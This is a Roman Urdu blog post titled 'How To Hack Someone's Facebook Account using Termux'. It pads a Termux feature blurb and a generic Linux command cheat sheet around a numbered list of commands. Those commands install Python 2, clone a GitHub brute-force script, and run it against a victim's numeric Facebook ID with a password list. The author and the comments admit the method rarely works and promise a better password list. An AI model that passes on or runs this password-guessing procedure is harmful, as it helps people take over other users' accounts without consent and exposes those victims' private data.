How To Hack Someone's Facebook Account using Termux






Assalam-o-Alaikum  doston Tau jaisay k hum log jantay hain k pura internet aisi videos se bhara para hai How To Hack Facebook Account ya aisa aur kuch aap unki video puri dekh lete hain but wo trick work nahi krti bcoz wo fake hoti hain . First of All main apko bta doon k waisay tau facebook account hack nahi hotay jo hotay hain wo srf 100 se srf 5 ya shayad 1 id hath ati hai kyn  k sb k password ab list walay tau hotay nahi.


Khair Ajj main Apko btaonga ga k ap Termux use kar k kaisay kisi ka facebook account Hack kar sktay hain is k liye ap ko kuch cheezon k khayal rakhna hoga



    Requirements for Facebook Hacking


    1. Termux App
    2. Commands
    3. Victim's Id

    Termux Introduction


    Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager.
    Get it on Google Play Get it on F-Droid

    Secure. 

    Access remote servers using the ssh client from OpenSSH. Termux combines standard packages with accurate terminal emulation in a beautiful open source solution.

    Feature packed. 

    Take your pick between Bash, fish or Zsh and nano, Emacs or Vim. Grep through your SMS inbox. Access API endpoints with curl and use rsync to store backups of your contact list on a remote server.

    Customizable. 

    Install what you want through the APT package management system known from Debian and Ubuntu GNU/Linux. Why not start with installing Git and syncing your dotfiles?

    Explorable. 

    Have you ever sat on a bus and wondered exactly which arguments tar accepts? Packages available in Termux are the same as those on Mac and Linux - install man pages on your phone and read them in one session while experimenting with them in another.

    With batteries included. 

    Can you imagine a more powerful yet elegant pocket calculator than a readline-powered Python console? Up-to-date versions of Perl, Python, Ruby and Node.js are all available.

    Ready to scale up. 

    Connect a Bluetooth keyboard and hook up your device to an external display if you need to - Termux supports keyboard shortcuts and has full mouse support.

    Tinkerable. 

    Develop by compiling C files with Clang and build your own projects with CMake and pkg-config. Both GDB and strace are available if you get stuck and need to debug.


    What is Commands ?



    The Linux command line, also known as the terminal, can be an intimidating place. But it can also be your most effective tool.
    Text commands often work regardless of which Linux-based operating system you use, and the results are often faster than what a graphical desktop interface can offer.

    The Linux Command Line Cheat Sheet

    Terminal

    clearClear the terminal screen.
    historyDisplay recently used commands. You can also view these commands via the Up and Down keys.
    !Repeat a recently used command. You can use !n to repeat the n-th command in history or !-n to repeat what happened n commands ago.
    manDisplay the manual for a terminal program.
    whatisDisplay a brief description of a terminal program. A simpler alternative to the man command.
    aliasCreate a shortcut to a command or, when combined with the cd command, directory.
    exitExit or close the terminal.

    Navigation & File Management

    cdChange directory. Used to navigate between folders.
    pwdDisplay current directory.
    cdChange current directory.
    lsDisplay a list of files in the current directory.
    cpMakes a copy of a file. Defaults to the current directory unless you specify a specific one.
    mvMove a file from one directory to another.
    rmRemove a file or set of files.
    statDisplay when a file was last accessed, modified, or changed.
    touchChange the date accessed or date modified time of a given file to right now.
    rmdirDelete a file or files.
    mkdirCreate a directory. Defaults to the current directory, but you can also specify one.
    rmdirDelete a directory. Defaults to the current directory, but you can also specify one. The target directory must be completely empty.
    renameChange the name of a file or set of files.
    findSearch a specific directory (or your entire PC) to find files that match designated criteria.
    locateSearch for files or directories. Faster than the find command, but has fewer options.
    grepSearch a specific file or set of files to see if a string of text exists and where.
    mountAttach a separate filesystem (such as an external hard drive or USB stick) to your system's main filesystem.
    umountDetach a separate filesystem from your system's main filesystem.
    catDisplay the contents of a text file. Also works with multiple files.
    chmodModify the read, write, and execute permissions of a file.
    chown

    Change the user or group that owns a file.

    Users

    suSwitch user. Unless you desigate a specific user, this command will attempt to sign in as the root user (which you can think of as the system administrator).
    whoamiDisplays the current user name.
    idDisplay current user and group.
    passwdCreate or update a user's password.

    System Administration

    unameDisplays core system information such as kernel version, hardware, and operating system.
    sudoEnter before a command to perform the command as a system administrator. User must have administrator priveleges for this to work.
    apt/dnf/pacmanPrograms for installing software and updates. Which one to use depends on your Linux-based operating system. Each requires administrator rights and additional instructions, such as sudo apt install program-name .
    jobsDisplay the status of all current jobs. A job is a representation of a running process or group of processes.
    bgSend a job to the background.
    fgSend a job to the foreground.
    killEnd a process according to its process ID (which you can get using the ps command.
    killallEnd all processes whose names match your query.
    psDisplay a list of running processes. Defaults to processes started by the current user.
    topDisplays a list of running processes, sorted by how much CPU each uses. Unlike ps, the command updates in real-time.
    uptimeDisplays time since last boot.
    whereisFinds the executable file for a program.
    dfDisplays how much disk space is used and free on your system.
    freeDisplays how much RAM is used and free on your system.

    Network Management

    ipDisplays you IP address, network interfaces, bandwidth usage, and more.
    pingSend or receive data from another computer on a network. Often used to test whether a network connection is established and the speed of that connection.
    digLook up a domain's DNS address
    wgetDownload a file.
    sshSecure Shell. Connect and login to a remote network location.

    Miscellaneous


    echoDisplay a line of text. Often used in programs and scripts to relay information to users.
    factorDisplays possible factors of a decimal number.
    exprSolve math equations.
    lookLook up a word in the dictionary.

    More Linux Terminal Commands

    As comprehensive as this Linux commands cheat sheet may be, the list is only scratching the surface. There is far more you can do in the terminal than we could ever hope to fit on one page. Plus many commands change depending on your Linux-based operating system or require installing additional programs. The commands above are likely to work out-of-the-box on most Linux machines.




    COMMANDS USE IN THIS METHOD

     1 = pkg update && pkg upgrade -y  
     2 = pkg install python  
     3 = pkg install python2  
     4 = pkg install git  
     5 = pip2 install --upgrade pip  
     6 = git clone https://github.com/venom-hun5/Targ3t.git  
     7 = cd Targ3t.py  
    8 = pip2 install requests 9 = pip2 install mechanize 10 = ls 11 = chmod 777 T4RG3T.py 12 = python2 T4RG3T.py 13 = paste victim id in numeric form 14 = (write password list's name) pk.txt

    Agar Kuch Smaj nah aye tau aap neechay di gae video dekh sktay hain
    👇



    Agr Ye Video Community Guidline Strike ki Wajah se remove ho gae tau apko ghabrana nahi hai aap neechay diye howay link se video download kr sktay hain 





    In main se aap kisi bhi link se video le sktay hain - Umeed hai apko ye trick pasand i hogi.

    Post a Comment

    4 Comments

    1. Replies
      1. bro har id uthaye ye fix nahi 100 main se koi aik ya 2 id uthti hain

        Delete
      2. coz sb k password list walay nahi hotay

        Delete
      3. main jald hi alag password list wali video daloonga wo 50 to 80% work kray gi

        Delete